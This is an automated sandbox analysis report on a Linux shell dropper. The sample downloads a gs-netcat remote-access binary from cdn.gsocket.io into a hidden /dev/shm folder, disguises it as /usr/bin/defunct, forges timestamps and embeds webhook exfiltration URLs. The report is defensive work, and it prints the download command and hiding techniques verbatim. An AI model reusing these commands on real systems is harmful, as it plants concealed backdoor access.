Linux Analysis Report
y

Overview

General Information

Sample name: y
Analysis ID: 1523256
MD5: b4ae01a2cca1052689c00d8ff4e94524
SHA1: 9d8b20bb6bb0471c16dfe8ccadc0a9441bd986ce
SHA256: 9cc787ca0b6e698b62f6e8ca5da6f2183a350acda9098b4194aa1894dcd39690
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Explicitly modifies time stamps using the "touch" command
Sample deletes itself
Writes ELF files to hidden directories
Writes identical ELF files to multiple locations
Changes permissions of common UNIX (system) binary directories
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "mkdir" command used to create folders
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps
Executes the "uname" command used to read OS and architecture name
Found strings indicative of a multi-platform dropper
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 Avira: detection malicious, Label: LINUX/AVI.Agent.wrdff
Source: /usr/bin/defunct Avira: detection malicious, Label: LINUX/AVI.Agent.wrdff
Multi AV Scanner detection for submitted file
Source: y ReversingLabs: Detection: 41%
Source: y Virustotal: Detection: 39% Perma Link
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pgrep (PID: 6287) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pgrep (PID: 6289) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Found strings indicative of a multi-platform dropper
Source: y String: # - Command to use for download. =wget or =curl.
Source: y String: # errexit "Need curl or wget."
Source: y String: FAIL_OUT "Need curl or wget. Try ${CM}apt install curl${CN}"
Reads the 'hosts' file potentially containing internal network hosts
Source: /usr/bin/curl (PID: 6337) Reads hosts file: /etc/hosts Jump to behavior
Source: /usr/bin/defunct (PID: 6353) Reads hosts file: /etc/hosts Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bin/gs-netcat_mini-linux-x86_64 HTTP/1.1Host: cdn.gsocket.ioUser-Agent: curl/7.68.0Accept: */*
Source: global traffic DNS traffic detected: DNS query: cdn.gsocket.io
Source: global traffic DNS traffic detected: DNS query: c.gs.thc.org
Source: y String found in binary or memory: https://api.telegram.org/bot$
Source: y String found in binary or memory: https://cdn.gsocket.io
Source: y String found in binary or memory: https://discord.com/api/webhooks/$
Source: y String found in binary or memory: https://foo.blah/log.php?s=
Source: y String found in binary or memory: https://github.com/hackerschoice/gsocket-relay
Source: y String found in binary or memory: https://github.com/hackerschoice/gsocket/releases$
Source: y String found in binary or memory: https://gsocket.io
Source: y String found in binary or memory: https://gsocket.io/x)
Source: y String found in binary or memory: https://t.me/thcorg$
Source: y String found in binary or memory: https://webhook.site
Source: y String found in binary or memory: https://webhook.site/$
Source: y String found in binary or memory: https://www.gsocket.io/deploy/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38076
Source: unknown Network traffic detected: HTTP traffic on port 40962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 38076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40962
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: # Must use same name on busybox-systems
Source: Initial sample String containing 'busybox' found: # Create empty crontab (busybox) if no crontab exists at all.
Source: classification engine Classification label: mal76.evad.lin@0/2@3/0

Persistence and Installation Behavior
barindex
Explicitly modifies time stamps using the "touch" command
Source: /usr/bin/bash (PID: 6356) Touch executable uses timestamp modification options: touch -t 202410010411.39 /dev/shm Jump to behavior
Source: /usr/bin/bash (PID: 6357) Touch executable uses timestamp modification options: touch -t 202109170423.51 /usr/bin Jump to behavior
Source: /usr/bin/bash (PID: 6358) Touch executable uses timestamp modification options: touch -t 200611251713.29 /usr/bin/defunct Jump to behavior
Writes ELF files to hidden directories
Source: /usr/bin/curl (PID: 6337) File written to hidden directory: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 Jump to dropped file
Writes identical ELF files to multiple locations
Source: /usr/bin/curl (PID: 6337) File with SHA-256 D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA written: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 Jump to dropped file
Source: /usr/bin/cp (PID: 6347) File with SHA-256 D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA written: /usr/bin/defunct Jump to dropped file
Changes permissions of common UNIX (system) binary directories
Source: /usr/bin/bash (PID: 6318) Chmod directory: /usr/bin/chmod -> chmod 600 /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6346) Chmod directory: /usr/bin/chmod -> chmod 600 /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6350) Chmod directory: /usr/bin/chmod -> chmod 700 /usr/bin/defunct Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/mkdir (PID: 6302) Directory: /dev/shm/.gs-0 Jump to behavior
Source: /usr/bin/touch (PID: 6305) File: /dev/shm/.gs-0/.gs-rw.lock Jump to behavior
Source: /usr/bin/curl (PID: 6337) Directory: /root/.curlrc Jump to behavior
Creates hidden files without content (potentially used as a mutex)
Source: /usr/bin/touch (PID: 6305) Empty hidden file: /dev/shm/.gs-0/.gs-rw.lock Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1582/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1582/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3088/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3088/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/230/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/230/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/231/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/231/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/232/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/232/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1579/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1579/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/233/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/233/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1699/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1699/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/234/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/234/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1335/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1335/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1698/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1698/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1334/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1334/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1576/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1576/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2302/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2302/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/236/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/236/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/237/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/237/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/910/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/910/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/912/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/912/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2307/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2307/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/918/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/918/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1594/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1594/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1349/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1349/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/4/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/125/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6287) File opened: /proc/125/cmdline Jump to behavior
Executes commands using a shell command-line interpreter
Source: /usr/bin/bash (PID: 6291) Shell command executed: /bin/bash -c "echo TRUE" Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /usr/bin/bash (PID: 6303) Chmod executable: /usr/bin/chmod -> chmod 700 /dev/shm/.gs-0 Jump to behavior
Source: /usr/bin/bash (PID: 6318) Chmod executable: /usr/bin/chmod -> chmod 600 /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6346) Chmod executable: /usr/bin/chmod -> chmod 600 /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6350) Chmod executable: /usr/bin/chmod -> chmod 700 /usr/bin/defunct Jump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /usr/bin/bash (PID: 6337) Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 Jump to behavior
Executes the "mkdir" command used to create folders
Source: /usr/bin/bash (PID: 6302) Mkdir executable: /usr/bin/mkdir -> mkdir /dev/shm/.gs-0 Jump to behavior
Executes the "pgrep" command search for and/or send signals to processes
Source: /usr/bin/bash (PID: 6287) Pgrep executable: /usr/bin/pgrep -> pgrep defunct Jump to behavior
Source: /usr/bin/bash (PID: 6289) Pgrep executable: /usr/bin/pgrep -> pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\]) Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /usr/bin/bash (PID: 6306) Rm executable: /usr/bin/rm -> rm -f /dev/shm/.gs-0/.gs-rw.lock Jump to behavior
Source: /usr/bin/bash (PID: 6343) Rm executable: /usr/bin/rm -> rm -f /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6349) Rm executable: /usr/bin/rm -> rm -f /dev/shm/.gs-0/gs-netcat Jump to behavior
Source: /usr/bin/bash (PID: 6354) Rm executable: /usr/bin/rm -> rm -rf /dev/shm/.gs-0/* Jump to behavior
Executes the "touch" command used to create files or modify time stamps
Source: /usr/bin/bash (PID: 6305) Touch executable: /usr/bin/touch -> touch /dev/shm/.gs-0/.gs-rw.lock Jump to behavior
Source: /usr/bin/bash (PID: 6317) Touch executable: /usr/bin/touch -> touch /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6345) Touch executable: /usr/bin/touch -> touch /usr/bin/defunct Jump to behavior
Source: /usr/bin/bash (PID: 6356) Touch executable: /usr/bin/touch -> touch -t 202410010411.39 /dev/shm Jump to behavior
Source: /usr/bin/bash (PID: 6357) Touch executable: /usr/bin/touch -> touch -t 202109170423.51 /usr/bin Jump to behavior
Source: /usr/bin/bash (PID: 6358) Touch executable: /usr/bin/touch -> touch -t 200611251713.29 /usr/bin/defunct Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/chmod (PID: 6303) File: /dev/shm/.gs-0 (bits: - usr: - grp: - all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6350) File: /usr/bin/defunct (bits: - usr: - grp: - all: rwx) Jump to behavior
Writes ELF files to disk
Source: /usr/bin/curl (PID: 6337) File written: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 Jump to dropped file
Source: /usr/bin/cp (PID: 6347) File written: /usr/bin/defunct Jump to dropped file
Source: /usr/bin/bash (PID: 6241) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6244) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6247) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6250) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6253) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6256) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6259) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6262) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6265) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6268) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6271) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6274) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior
Source: /usr/bin/bash (PID: 6285) Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/g Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Drops files in suspicious directories
Source: /usr/bin/cp (PID: 6347) File: /usr/bin/defunct Jump to dropped file
Sample deletes itself
Source: /usr/bin/rm (PID: 6343) File: /usr/bin/defunct Jump to behavior
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Source: /usr/bin/bash (PID: 6280) Base64 executable: /usr/bin/base64 -> base64 -w0 Jump to behavior
Source: /usr/bin/bash (PID: 6281) Base64 executable: /usr/bin/base64 -> base64 -d Jump to behavior
Source: /usr/bin/bash (PID: 6327) Base64 executable: /usr/bin/base64 -> base64 -w0 Jump to behavior
Source: /usr/bin/bash (PID: 6331) Base64 executable: /usr/bin/base64 -> base64 -w0 Jump to behavior
Source: /usr/bin/bash (PID: 6335) Base64 executable: /usr/bin/base64 -> base64 -w0 Jump to behavior
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pgrep (PID: 6287) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pgrep (PID: 6289) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/bash (PID: 6238) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 6277) Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 6291) Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 6337) Queries kernel information via 'uname': Jump to behavior
Executes the "uname" command used to read OS and architecture name
Source: /usr/bin/bash (PID: 6277) Uname executable: /usr/bin/uname -> uname -m Jump to behavior

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
92.60.39.208
 cdn.gsocket.io Germany
197540 NETCUP-ASnetcupGmbHDE false
109.202.202.202
 unknown Switzerland
13030 INIT7CH false
45.14.164.3
 c.gs.thc.org Germany
209987 VALCANALE-NETIT false
91.189.91.43
 unknown United Kingdom
41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom
41231 CANONICAL-ASGB false

Contacted Domains

Name IP Active
cdn.gsocket.io 92.60.39.208 true
c.gs.thc.org 45.14.164.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 true
    		unknown